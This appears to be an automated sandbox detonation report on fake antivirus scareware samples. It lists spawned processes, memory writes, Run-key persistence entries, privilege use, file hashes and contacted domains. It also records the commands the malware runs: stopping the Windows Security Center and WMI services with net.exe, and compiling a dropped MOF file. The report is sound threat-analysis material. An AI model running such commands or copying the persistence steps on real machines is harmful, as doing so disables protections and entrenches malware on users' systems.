PID 4168 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV2.EXE
PID 4168 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE
PID 4168 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE
PID 4168 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE
PID 4168 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\EN.EXE
PID 4168 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\EN.EXE
PID 4168 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\EN.EXE
PID 4168 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\SB.EXE
PID 4168 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\SB.EXE
PID 4168 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\SB.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe"

C:\Users\Admin\AppData\Local\Temp\AV.EXE

"C:\Users\Admin\AppData\Local\Temp\AV.EXE"

C:\Users\Admin\AppData\Local\Temp\AV2.EXE

"C:\Users\Admin\AppData\Local\Temp\AV2.EXE"

C:\Users\Admin\AppData\Local\Temp\DB.EXE

"C:\Users\Admin\AppData\Local\Temp\DB.EXE"

C:\Users\Admin\AppData\Local\Temp\EN.EXE

"C:\Users\Admin\AppData\Local\Temp\EN.EXE"

C:\Users\Admin\AppData\Local\Temp\SB.EXE

"C:\Users\Admin\AppData\Local\Temp\SB.EXE"

C:\Windows\SysWOW64\cmd.exe

/c C:\Users\Admin\AppData\Local\Temp\~unins9125.bat "C:\Users\Admin\AppData\Local\Temp\DB.EXE"

Network

Country Destination Domain Proto
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 aeravine.com udp
US 8.8.8.8:53 middlechrist.com udp
US 8.8.8.8:53 bemachin.com udp
US 66.96.162.135:80 middlechrist.com tcp
US 8.8.8.8:53 135.162.96.66.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\AV.EXE

MD5 f284568010505119f479617a2e7dc189
SHA1 e23707625cce0035e3c1d2255af1ed326583a1ea
SHA256 26c8f13ea8dc17443a9fa005610537cb6700aebaf748e747e9278d504e416eb1
SHA512 ebe96e667dfde547c5a450b97cd7534b977f4073c7f4cbc123a0e00baaefeb3be725c1cafbfb5bb040b3359267954cd1b4e2094ef71fc273732016ee822064bf

C:\Users\Admin\AppData\Local\Temp\AV.EXE

MD5 eb5969d607ba3ad6184210472583cc12
SHA1 05fb52c38d2f5152c90a579f1aab317fcab5c570
SHA256 2c54a179e28325875bbb092ea3519868462210cecf22726e460a8c9d2ef1695c
SHA512 e6ccd02c2115863d95178e7c65018ab986d616f4cc96a5de143b8274af1dfbc336581836c3d1572edbe2d460c1addb18709466a190c31249b5172cdf60f79110

C:\Users\Admin\AppData\Local\Temp\AV2.EXE

MD5 014578edb7da99e5ba8dd84f5d26dfd5
SHA1 df56d701165a480e925a153856cbc3ab799c5a04
SHA256 4ce5e8b510895abb204f97e883d8cbaacc29ccef0844d9ae81f8666f234b0529
SHA512 bd5159af96d83fc7528956c5b1bd6f93847db18faa0680c6041f87bbebef5e3ba2de1f185d77ff28b8d7d78ec4f7bd54f48b37a16da39f43314ef022b4a36068

C:\Users\Admin\AppData\Local\Temp\DB.EXE

MD5 c6746a62feafcb4fca301f606f7101fa
SHA1 e09cd1382f9ceec027083b40e35f5f3d184e485f
SHA256 b5a255d0454853c8afc0b321e1d86dca22c3dbefb88e5d385d2d72f9bc0109e6
SHA512 ee5dfa08c86bf1524666f0851c729970dbf0b397db9595a2bae01516299344edb68123e976592a83e492f2982fafe8d350ba2d41368eb4ecf4e6fe12af8f5642

memory/4940-31-0x0000000000400000-0x0000000000445000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EN.EXE

MD5 621f2279f69686e8547e476b642b6c46
SHA1 66f486cd566f86ab16015fe74f50d4515decce88
SHA256 c17a18cf2c243303b8a6688aad83b3e6e9b727fcd89f69065785ef7f1a2a3e38
SHA512 068402b02f1056b722f21b0a354b038f094d02e4a066b332553cd6b36e3640e8f35aa0499a2b057c566718c3593d3cea6bbabd961e04f0a001fd45d8be8e1c4e

memory/4940-45-0x00000000001C0000-0x00000000001F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\GB.EXE

MD5 fe731b4c6684d643eb5b55613ef9ed31
SHA1 cfafe2a14f5413278304920154eb467f7c103c80
SHA256 e7953daad7a68f8634ded31a21a31f0c2aa394ca9232e2f980321f7b69176496
SHA512 f7756d69138df6d3b0ffa47bdf274e5fd8aab4fff9d68abe403728c8497ac58e0f3d28d41710de715f57b7a2b5daa2dd7e04450f19c6d013a08f543bd6fc9c2e

C:\Users\Admin\AppData\Local\Temp\SB.EXE

MD5 9252e1be9776af202d6ad5c093637022
SHA1 6cc686d837cd633d9c2e8bc1eaba5fc364bf71d8
SHA256 ce822ff86e584f15b6abd14c61453bd3b481d4ec3fdeb961787fceb52acd8bd6
SHA512 98b1b3ce4d16d36f738478c6cf41e8f4a57d3a5ecfa8999d45592f79a469d8af8554bf4d5db34cb79cec71ce103f4fde1b41bd3cce30714f803e432e53da71ea

memory/4940-48-0x0000000000590000-0x0000000000623000-memory.dmp

memory/1100-51-0x0000000000400000-0x000000000040A000-memory.dmp

memory/4380-59-0x0000000073BA0000-0x0000000074151000-memory.dmp

memory/4940-60-0x0000000000590000-0x0000000000623000-memory.dmp

memory/4940-61-0x0000000000590000-0x0000000000623000-memory.dmp

memory/668-64-0x0000000000400000-0x0000000000464000-memory.dmp

memory/4380-62-0x0000000073BA0000-0x0000000074151000-memory.dmp

memory/668-68-0x0000000000830000-0x0000000000894000-memory.dmp

memory/4940-67-0x0000000000590000-0x0000000000623000-memory.dmp

memory/668-69-0x000000000083B000-0x000000000083C000-memory.dmp

memory/668-70-0x0000000000400000-0x0000000000464000-memory.dmp

memory/4380-71-0x0000000000890000-0x00000000008A0000-memory.dmp

memory/4940-72-0x00000000008A0000-0x00000000008A1000-memory.dmp

memory/1100-74-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Fake AV\tsa.crt

MD5 6e630504be525e953debd0ce831b9aa0
SHA1 edfa47b3edf98af94954b5b0850286a324608503
SHA256 2563fe2f793f119a1bae5cca6eab9d8c20409aa1f1e0db341c623e1251244ef5
SHA512 bbcf285309a4d5605e19513c77ef077a4c451cbef04e3cbdfec6d15cc157a9800a7ff6f70964b0452ddb939ff50766e887904eda06a9999fdedf5b2e8776ebd2

memory/4764-86-0x0000000000560000-0x0000000000563000-memory.dmp

memory/4764-90-0x0000000000400000-0x00000000004C3000-memory.dmp

memory/4764-91-0x0000000000650000-0x0000000000651000-memory.dmp

memory/4940-92-0x0000000000590000-0x0000000000623000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

152s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Antivirus = "\"C:\\Program Files (x86)\\AnVi\\avt.exe\" -noscan" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\wbem\repository\MAPPING2.MAP C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\wbem\repository\MAPPING3.MAP C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\wbem\repository\OBJECTS.DATA C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\wbem\repository\INDEX.BTR C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\wbem\repository C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\wbem\repository\WRITABLE.TST C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\wbem\repository\MAPPING1.MAP C:\Windows\system32\svchost.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\AnVi\splash.mp3 C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File created C:\Program Files (x86)\AnVi\virus.mp3 C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Use FormSuggest = "Yes" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\mofcomp.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3104 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 3104 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 3104 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 1056 wrote to memory of 2120 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1056 wrote to memory of 2120 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1056 wrote to memory of 2120 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1032 wrote to memory of 4984 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1032 wrote to memory of 4984 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1032 wrote to memory of 4984 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4480 wrote to memory of 4832 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4480 wrote to memory of 4832 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4480 wrote to memory of 4832 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4800 wrote to memory of 764 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4800 wrote to memory of 764 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4800 wrote to memory of 764 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe"

C:\Windows\SysWOW64\net.exe

net stop wscsvc

C:\Windows\SysWOW64\net.exe

net stop winmgmt /y

C:\Windows\SysWOW64\net.exe

net start winmgmt

C:\Windows\SysWOW64\net.exe

net start wscsvc

C:\Windows\SysWOW64\Wbem\mofcomp.exe

mofcomp C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wscsvc

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start wscsvc

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop winmgmt /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 highway-traffic.com udp
US 8.8.8.8:53 searchdusty.com udp
CA 54.39.157.64:80 searchdusty.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 fastsofgeld.com udp
US 8.8.8.8:53 frequentwin.com udp
US 8.8.8.8:53 64.157.39.54.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 highway-traffic.com udp
CA 54.39.157.64:80 searchdusty.com tcp
US 8.8.8.8:53 fastsofgeld.com udp
US 8.8.8.8:53 frequentwin.com udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 highway-traffic.com udp
CA 54.39.157.64:80 searchdusty.com tcp
US 8.8.8.8:53 fastsofgeld.com udp
US 8.8.8.8:53 frequentwin.com udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof

MD5 7fad92afda308dca8acfc6ff45c80c24
SHA1 a7fa35e7f90f772fc943c2e940737a48b654c295
SHA256 76e19416eb826a27bdcf626c3877cf7812bbe9b62cc2ccc5c2f65461d644246f
SHA512 49eed1e1197401cb856064bf7fdbd9f3bc57f3c864d47f509346d44eed3b54757d8c6cdb6254990d21291065f0762d2a1588d09e43c5728f77a420f6a8dcd6ea

Analysis: behavioral11

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

144s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\AntiVirus Pro 2017 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Fake AV\\AntivirusPro2017.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
